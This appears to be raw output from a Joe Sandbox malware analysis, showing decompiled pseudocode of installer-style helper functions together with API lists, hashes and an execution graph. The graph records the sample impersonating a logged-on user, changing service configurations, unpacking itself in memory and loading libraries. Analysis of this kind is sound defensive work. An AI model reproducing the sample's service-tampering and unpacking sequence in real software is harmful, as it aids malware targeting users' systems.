                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                      					QueryPerformanceCounter( &_v24);
                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                      					_t39 = _t36;
                                                                      					if(_t36 == 0xbb40e64e || ( *0xf88004 & 0xffff0000) == 0) {
                                                                      						_t36 = 0xbb40e64f;
                                                                      						_t39 = 0xbb40e64f;
                                                                      					}
                                                                      					 *0xf88004 = _t39;
                                                                      				}
                                                                      				_t37 =  !_t36;
                                                                      				 *0xf88008 = _t37;
                                                                      				return _t37;
                                                                      			}











                                                                      0x00f8715d
                                                                      0x00f87161
                                                                      0x00f87165
                                                                      0x00f87178
                                                                      0x00f87182
                                                                      0x00f8718e
                                                                      0x00f87197
                                                                      0x00f871a0
                                                                      0x00f871b1
                                                                      0x00f871b8
                                                                      0x00f871c4
                                                                      0x00f871c7
                                                                      0x00f871cb
                                                                      0x00f871d5
                                                                      0x00f871da
                                                                      0x00f871da
                                                                      0x00f871dc
                                                                      0x00f871dc
                                                                      0x00f871e2
                                                                      0x00f871e5
                                                                      0x00f871ee

                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F87182
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00F87191
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00F8719A
                                                                      • GetTickCount.KERNEL32 ref: 00F871A3
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00F871B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: acedf29784ceade29a62bef7c18de84e2761f7964f082cdaf570d099ff5a88a7
                                                                      • Instruction ID: 119c50f11e19e2f3e0b8d2d475fa5528bcfd264ee14c0bd485c31444b651d7d8
                                                                      • Opcode Fuzzy Hash: acedf29784ceade29a62bef7c18de84e2761f7964f082cdaf570d099ff5a88a7
                                                                      • Instruction Fuzzy Hash: 23112871D0560C9BCF10EBB8DA48AEEBBF4EB08350FA14856D801E7214EA309A05AF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E00F863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				long _v272;
                                                                      				void* _v276;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t15;
                                                                      				long _t28;
                                                                      				struct _OVERLAPPED* _t37;
                                                                      				void* _t39;
                                                                      				signed int _t40;
                                                                      
                                                                      				_t15 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t15 ^ _t40;
                                                                      				_v272 = _v272 & 0x00000000;
                                                                      				_push(__ecx);
                                                                      				_v276 = _a16;
                                                                      				_t37 = 1;
                                                                      				E00F81781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      				E00F8658A( &_v268, 0x104, _a12);
                                                                      				_t28 = 0;
                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                      				if(_t39 != 0xffffffff) {
                                                                      					_t28 = _a4;
                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                      						 *0xf89124 = 0x80070052;
                                                                      						_t37 = 0;
                                                                      					}
                                                                      					CloseHandle(_t39);
                                                                      				} else {
                                                                      					 *0xf89124 = 0x80070052;
                                                                      					_t37 = 0;
                                                                      				}
                                                                      				return E00F86CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                      			}















                                                                      0x00f863cb
                                                                      0x00f863d2
                                                                      0x00f863d8
                                                                      0x00f863ea
                                                                      0x00f863f3
                                                                      0x00f86401
                                                                      0x00f86402
                                                                      0x00f86410
                                                                      0x00f86415
                                                                      0x00f86433
                                                                      0x00f86438
                                                                      0x00f86449
                                                                      0x00f86463
                                                                      0x00f8646d
                                                                      0x00f86477
                                                                      0x00f86477
                                                                      0x00f8647a
                                                                      0x00f8643a
                                                                      0x00f8643a
                                                                      0x00f86444
                                                                      0x00f86444
                                                                      0x00f86492

                                                                      APIs
                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F8642D
                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F8645B
                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F8647A
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F863EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                      • API String ID: 1065093856-1116576409
                                                                      • Opcode ID: bd3857ede2055ec53e4dee66846e64de45238bfce8f0ed741169ff3e596c9ba7
                                                                      • Instruction ID: 14746c62804371590d1fadec75ad96ce43b6c250d46e65103746dc1d49c9ecbb
                                                                      • Opcode Fuzzy Hash: bd3857ede2055ec53e4dee66846e64de45238bfce8f0ed741169ff3e596c9ba7
                                                                      • Instruction Fuzzy Hash: 1921C071A0021CABDB10EF65DCC5FEF77A8EB45314F0041A9B585A7280DAB45D85AFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F847E0(intOrPtr* __ecx) {
                                                                      				intOrPtr _t6;
                                                                      				intOrPtr _t9;
                                                                      				void* _t11;
                                                                      				void* _t19;
                                                                      				intOrPtr* _t22;
                                                                      				void _t24;
                                                                      				struct HWND__* _t25;
                                                                      				struct HWND__* _t26;
                                                                      				void* _t27;
                                                                      				intOrPtr* _t28;
                                                                      				intOrPtr* _t33;
                                                                      				void* _t34;
                                                                      
                                                                      				_t33 = __ecx;
                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                      				if(_t34 != 0) {
                                                                      					_t22 = _t33;
                                                                      					_t27 = _t22 + 1;
                                                                      					do {
                                                                      						_t6 =  *_t22;
                                                                      						_t22 = _t22 + 1;
                                                                      					} while (_t6 != 0);
                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                      					 *_t34 = _t24;
                                                                      					if(_t24 != 0) {
                                                                      						_t28 = _t33;
                                                                      						_t19 = _t28 + 1;
                                                                      						do {
                                                                      							_t9 =  *_t28;
                                                                      							_t28 = _t28 + 1;
                                                                      						} while (_t9 != 0);
                                                                      						E00F81680(_t24, _t28 - _t19 + 1, _t33);
                                                                      						_t11 =  *0xf891e0; // 0x798408
                                                                      						 *(_t34 + 4) = _t11;
                                                                      						 *0xf891e0 = _t34;
                                                                      						return 1;
                                                                      					}
                                                                      					_t25 =  *0xf88584; // 0x0
                                                                      					E00F844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                      					LocalFree(_t34);
                                                                      					L2:
                                                                      					return 0;
                                                                      				}
                                                                      				_t26 =  *0xf88584; // 0x0
                                                                      				E00F844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                      				goto L2;
                                                                      			}















                                                                      0x00f847e8
                                                                      0x00f847f0
                                                                      0x00f847f4
                                                                      0x00f8480f
                                                                      0x00f84811
                                                                      0x00f84814
                                                                      0x00f84814
                                                                      0x00f84816
                                                                      0x00f84817
                                                                      0x00f84829
                                                                      0x00f8482b
                                                                      0x00f8482f
                                                                      0x00f8484f
                                                                      0x00f84852
                                                                      0x00f84855
                                                                      0x00f84855
                                                                      0x00f84857
                                                                      0x00f84858
                                                                      0x00f84860
                                                                      0x00f84865
                                                                      0x00f8486a
                                                                      0x00f8486f
                                                                      0x00000000
                                                                      0x00f84876
                                                                      0x00f84831
                                                                      0x00f84841
                                                                      0x00f84847
                                                                      0x00f8480b
                                                                      0x00000000
                                                                      0x00f8480b
                                                                      0x00f847f6
                                                                      0x00f84806
                                                                      0x00000000

                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00F84E6F), ref: 00F847EA
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00F84823
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00F84847
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F84851
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                      • API String ID: 359063898-1116576409
                                                                      • Opcode ID: c190e038688333596cac6fbab27dacc48fc0c49509f4fcdaf9f0375e561d1ef5
                                                                      • Instruction ID: d2b55955bc15a6e7ea0e2654f7c4de75b5bb33b86ecad95187507d65248e06c2
                                                                      • Opcode Fuzzy Hash: c190e038688333596cac6fbab27dacc48fc0c49509f4fcdaf9f0375e561d1ef5
                                                                      • Instruction Fuzzy Hash: BB11E975604A42AFE714AF249C18FF73B5AEB85750F048519FD829B341DB39AC06A760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F83680(void* __ecx) {
                                                                      				void* _v8;
                                                                      				struct tagMSG _v36;
                                                                      				int _t8;
                                                                      				struct HWND__* _t16;
                                                                      
                                                                      				_v8 = __ecx;
                                                                      				_t16 = 0;
                                                                      				while(1) {
                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                      					if(_t8 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                      						continue;
                                                                      					} else {
                                                                      						do {
                                                                      							if(_v36.message != 0x12) {
                                                                      								DispatchMessageA( &_v36);
                                                                      							} else {
                                                                      								_t16 = 1;
                                                                      							}
                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                      						} while (_t8 != 0);
                                                                      						if(_t16 == 0) {
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				return _t8;
                                                                      			}







                                                                      0x00f8368c
                                                                      0x00f8368f
                                                                      0x00f83691
                                                                      0x00f8369f
                                                                      0x00f836a7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f836ba
                                                                      0x00000000
                                                                      0x00f836bc
                                                                      0x00f836bc
                                                                      0x00f836c0
                                                                      0x00f836cb
                                                                      0x00f836c2
                                                                      0x00f836c4
                                                                      0x00f836c4
                                                                      0x00f836da
                                                                      0x00f836e0
                                                                      0x00f836e6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f836e6
                                                                      0x00000000
                                                                      0x00f836ba
                                                                      0x00f836ed

                                                                      APIs
                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F8369F
                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836B2
                                                                      • DispatchMessageA.USER32(?), ref: 00F836CB
                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                      • String ID:
                                                                      • API String ID: 2776232527-0
                                                                      • Opcode ID: 832eaf69142da6d810ebc03950e016d223c3909ef33070e75cf7afd06e772c1b
                                                                      • Instruction ID: 08420924679f50936865472e67414d024ad850c8cd23b359424f5f36ee18f569
                                                                      • Opcode Fuzzy Hash: 832eaf69142da6d810ebc03950e016d223c3909ef33070e75cf7afd06e772c1b
                                                                      • Instruction Fuzzy Hash: 7A01A772D0021877DB305BAA9C4CEEB777CEBC5F20F10012AFE05E2294E561C640EB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00F86517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                      				struct HRSRC__* _t6;
                                                                      				void* _t21;
                                                                      				struct HINSTANCE__* _t23;
                                                                      				int _t24;
                                                                      
                                                                      				_t23 =  *0xf89a3c; // 0xf80000
                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                      				if(_t6 == 0) {
                                                                      					L6:
                                                                      					E00F844B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                      					_t24 = _a16;
                                                                      				} else {
                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                      					if(_t21 == 0) {
                                                                      						goto L6;
                                                                      					} else {
                                                                      						if(_a12 != 0) {
                                                                      							_push(_a12);
                                                                      						} else {
                                                                      							_push(0);
                                                                      						}
                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                      						FreeResource(_t21);
                                                                      						if(_t24 == 0xffffffff) {
                                                                      							goto L6;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t24;
                                                                      			}







                                                                      0x00f8651f
                                                                      0x00f8652a
                                                                      0x00f86534
                                                                      0x00f8656b
                                                                      0x00f86577
                                                                      0x00f8657c
                                                                      0x00f86536
                                                                      0x00f8653e
                                                                      0x00f86542
                                                                      0x00000000
                                                                      0x00f86544
                                                                      0x00f86547
                                                                      0x00f8654c
                                                                      0x00f86549
                                                                      0x00f86549
                                                                      0x00f86549
                                                                      0x00f8655e
                                                                      0x00f86560
                                                                      0x00f86569
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f86569
                                                                      0x00f86542
                                                                      0x00f86587

                                                                      APIs
                                                                      • FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                      • LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                      • DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                      • FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                      • String ID:
                                                                      • API String ID: 1214682469-0
                                                                      • Opcode ID: c8bcdb0e43b1f7c0add6ed61c70baafe9e144c3ee17388a5bc395fcf375bc0be
                                                                      • Instruction ID: 038db0188b6b6ecfeb8200b909a4f3424ee9bf7b758b181cf6235dbd9acd4c24
                                                                      • Opcode Fuzzy Hash: c8bcdb0e43b1f7c0add6ed61c70baafe9e144c3ee17388a5bc395fcf375bc0be
                                                                      • Instruction Fuzzy Hash: DB012672500609BBDB106FA99C08EFB7B6DEB85770F08012AFE00E7190D7758C10BBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00F865E8(char* __ecx) {
                                                                      				char _t3;
                                                                      				char _t10;
                                                                      				char* _t12;
                                                                      				char* _t14;
                                                                      				char* _t15;
                                                                      				CHAR* _t16;
                                                                      
                                                                      				_t12 = __ecx;
                                                                      				_t15 = __ecx;
                                                                      				_t14 =  &(__ecx[1]);
                                                                      				_t10 = 0;
                                                                      				do {
                                                                      					_t3 =  *_t12;
                                                                      					_t12 =  &(_t12[1]);
                                                                      				} while (_t3 != 0);
                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                      				while(1) {
                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                      					if(_t16 <= _t15) {
                                                                      						break;
                                                                      					}
                                                                      					if( *_t16 == 0x5c) {
                                                                      						L7:
                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                      							_t16 = CharNextA(_t16);
                                                                      						}
                                                                      						 *_t16 = _t10;
                                                                      						_t10 = 1;
                                                                      					} else {
                                                                      						_push(_t16);
                                                                      						continue;
                                                                      					}
                                                                      					L11:
                                                                      					return _t10;
                                                                      				}
                                                                      				if( *_t16 == 0x5c) {
                                                                      					goto L7;
                                                                      				}
                                                                      				goto L11;
                                                                      			}









                                                                      0x00f865e8
                                                                      0x00f865ed
                                                                      0x00f865ef
                                                                      0x00f865f2
                                                                      0x00f865f4
                                                                      0x00f865f4
                                                                      0x00f865f6
                                                                      0x00f865f7
                                                                      0x00f86608
                                                                      0x00f86611
                                                                      0x00f86618
                                                                      0x00f8661c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8660e
                                                                      0x00f86623
                                                                      0x00f86625
                                                                      0x00f8663b
                                                                      0x00f8663b
                                                                      0x00f8663d
                                                                      0x00f86641
                                                                      0x00f86610
                                                                      0x00f86610
                                                                      0x00000000
                                                                      0x00f86610
                                                                      0x00f86644
                                                                      0x00f86647
                                                                      0x00f86647
                                                                      0x00f86621
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00F82B33), ref: 00F86602
                                                                      • CharPrevA.USER32(?,00000000), ref: 00F86612
                                                                      • CharPrevA.USER32(?,00000000), ref: 00F86629
                                                                      • CharNextA.USER32(00000000), ref: 00F86635
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Prev$Next
                                                                      • String ID:
                                                                      • API String ID: 3260447230-0
                                                                      • Opcode ID: 95a30be76d7a37c4ae2dcc1a5f5bc2b1f06fb563fe469f0a4508d274fa917753
                                                                      • Instruction ID: 299e924a534fcbca7eb75718cccfd759b86cc50cca99043f17e5d2ca433e4bf5
                                                                      • Opcode Fuzzy Hash: 95a30be76d7a37c4ae2dcc1a5f5bc2b1f06fb563fe469f0a4508d274fa917753
                                                                      • Instruction Fuzzy Hash: 45F028328045D06EE7322B288CCC9FBBF9CCF87374B2901AFE491D6001E6150D06AB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F869B0() {
                                                                      				intOrPtr* _t4;
                                                                      				intOrPtr* _t5;
                                                                      				void* _t6;
                                                                      				intOrPtr _t11;
                                                                      				intOrPtr _t12;
                                                                      
                                                                      				 *0xf881f8 = E00F86C70();
                                                                      				__set_app_type(E00F86FBE(2));
                                                                      				 *0xf888a4 =  *0xf888a4 | 0xffffffff;
                                                                      				 *0xf888a8 =  *0xf888a8 | 0xffffffff;
                                                                      				_t4 = __p__fmode();
                                                                      				_t11 =  *0xf88528; // 0x0
                                                                      				 *_t4 = _t11;
                                                                      				_t5 = __p__commode();
                                                                      				_t12 =  *0xf8851c; // 0x0
                                                                      				 *_t5 = _t12;
                                                                      				_t6 = E00F87000();
                                                                      				if( *0xf88000 == 0) {
                                                                      					__setusermatherr(E00F87000);
                                                                      				}
                                                                      				E00F871EF(_t6);
                                                                      				return 0;
                                                                      			}








                                                                      0x00f869b7
                                                                      0x00f869c2
                                                                      0x00f869c8
                                                                      0x00f869cf
                                                                      0x00f869d8
                                                                      0x00f869de
                                                                      0x00f869e4
                                                                      0x00f869e6
                                                                      0x00f869ec
                                                                      0x00f869f2
                                                                      0x00f869f4
                                                                      0x00f86a00
                                                                      0x00f86a07
                                                                      0x00f86a0d
                                                                      0x00f86a0e
                                                                      0x00f86a15

                                                                      APIs
                                                                        • Part of subcall function 00F86FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00F86FC5
                                                                      • __set_app_type.MSVCRT ref: 00F869C2
                                                                      • __p__fmode.MSVCRT ref: 00F869D8
                                                                      • __p__commode.MSVCRT ref: 00F869E6
                                                                      • __setusermatherr.MSVCRT ref: 00F86A07
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                      • String ID:
                                                                      • API String ID: 1632413811-0
                                                                      • Opcode ID: 403a9108639fcebffffdcf7a6fa3cd8571ea49ab9ad0cb62caf12369bba4c551
                                                                      • Instruction ID: f50726348e5ae571c8d528ac3aaccc42d652a483433e80a023c1e25af142567b
                                                                      • Opcode Fuzzy Hash: 403a9108639fcebffffdcf7a6fa3cd8571ea49ab9ad0cb62caf12369bba4c551
                                                                      • Instruction Fuzzy Hash: BAF098745093098FDB68BB34BD0E6E43B61FB05371B60061AE461862E5CF3ED546BB16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:3.7%
                                                                      Dynamic/Decrypted Code Coverage:30.8%
                                                                      Signature Coverage:14%
                                                                      Total number of Nodes:399
                                                                      Total number of Limit Nodes:39
                                                                      execution_graph 25589 405a20 25590 405a5a 25589->25590 25599 405a34 25589->25599 25592 405bb3 _realloc 25593 405bf4 25592->25593 25631 40bf62 77 API calls __fread_nolock 25592->25631 25596 4055e0 77 API calls 25596->25599 25599->25590 25599->25592 25599->25596 25600 405000 25599->25600 25628 40bfc1 63 API calls __getptd_noexit 25599->25628 25629 40bf62 77 API calls __fread_nolock 25599->25629 25630 40bc8e 63 API calls __tsopen_nolock 25599->25630 25601 405051 25600->25601 25602 40500c 25600->25602 25603 40506f 25601->25603 25635 404f90 25601->25635 25632 40bfc1 63 API calls __getptd_noexit 25602->25632 25603->25599 25606 40501e 25633 40bf62 77 API calls __fread_nolock 25606->25633 25607 405099 25609 404f90 77 API calls 25607->25609 25613 4050a0 25609->25613 25610 40503f 25610->25601 25634 40bc8e 63 API calls __tsopen_nolock 25610->25634 25611 405143 25611->25599 25613->25611 25614 404f90 77 API calls 25613->25614 25615 4050ca 25613->25615 25614->25613 25616 404f90 77 API calls 25615->25616 25622 4050f1 25615->25622 25617 4050d4 25616->25617 25620 404f90 77 API calls 25617->25620 25618 404f90 77 API calls 25618->25622 25619 40511e 25621 405132 25619->25621 25626 404f90 77 API calls 25619->25626 25624 4050db 25620->25624 25621->25599 25622->25618 25625 405104 25622->25625 25623 404f90 77 API calls 25623->25625 25624->25622 25627 404f90 77 API calls 25624->25627 25625->25619 25625->25623 25626->25619 25627->25624 25628->25599 25629->25599 25630->25599 25631->25593 25632->25606 25633->25610 25634->25601 25636 404f96 25635->25636 25643 404fd5 25635->25643 25641 404fe7 25636->25641 25644 40bfc1 63 API calls __getptd_noexit 25636->25644 25638 404fa1 25645 40bf62 77 API calls __fread_nolock 25638->25645 25640 404fbb 25640->25641 25646 40bc8e 63 API calls __tsopen_nolock 25640->25646 25641->25607 25643->25607 25644->25638 25645->25640 25646->25643 25669 5b092b GetPEB 25670 5b0972 25669->25670 25647 2399ed8 25648 2399f19 ImpersonateLoggedOnUser 25647->25648 25649 2399f46 25648->25649 25671 239a1a8 25672 239a226 ChangeServiceConfigA 25671->25672 25674 239a4b2 25672->25674 25675 23996a8 25678 2399701 GetUserNameA 25675->25678 25677 2399806 25678->25677 25679 239a0e8 25680 239a130 ControlService 25679->25680 25681 239a167 25680->25681 25682 23999e8 25684 2399a3d OpenServiceA 25682->25684 25685 2399ad4 25684->25685 25650 5b003c 25651 5b0049 25650->25651 25663 5b0e0f SetErrorMode SetErrorMode 25651->25663 25656 5b0265 25657 5b02ce VirtualProtect 25656->25657 25659 5b030b 25657->25659 25658 5b0439 VirtualFree 25662 5b04be LoadLibraryA 25658->25662 25659->25658 25661 5b08c7 25662->25661 25664 5b0223 25663->25664 25665 5b0d90 25664->25665 25666 5b0dad 25665->25666 25667 5b0dbb GetPEB 25666->25667 25668 5b0238 VirtualAlloc 25666->25668 25667->25668 25668->25656 25686 2399920 25687 239996b OpenSCManagerW 25686->25687 25689 23999b4 25687->25689 25690 2390980 25691 2390989 25690->25691 25693 2394a25 25690->25693 25696 23990d0 25693->25696 25698 23990e3 25696->25698 25700 2399180 25698->25700 25701 23991c8 VirtualProtect 25700->25701 25703 2394a47 25701->25703 25704 5b0920 TerminateProcess 25705 40cbdd 25706 40cbe9 __calloc_impl 25705->25706 25740 40d534 HeapCreate 25706->25740 25709 40cc46 25742 41087e GetModuleHandleW 25709->25742 25713 40cc57 __RTC_Initialize 25776 411a15 25713->25776 25716 40cc66 25717 40cc72 GetCommandLineA 25716->25717 25907 40e79a 63 API calls 3 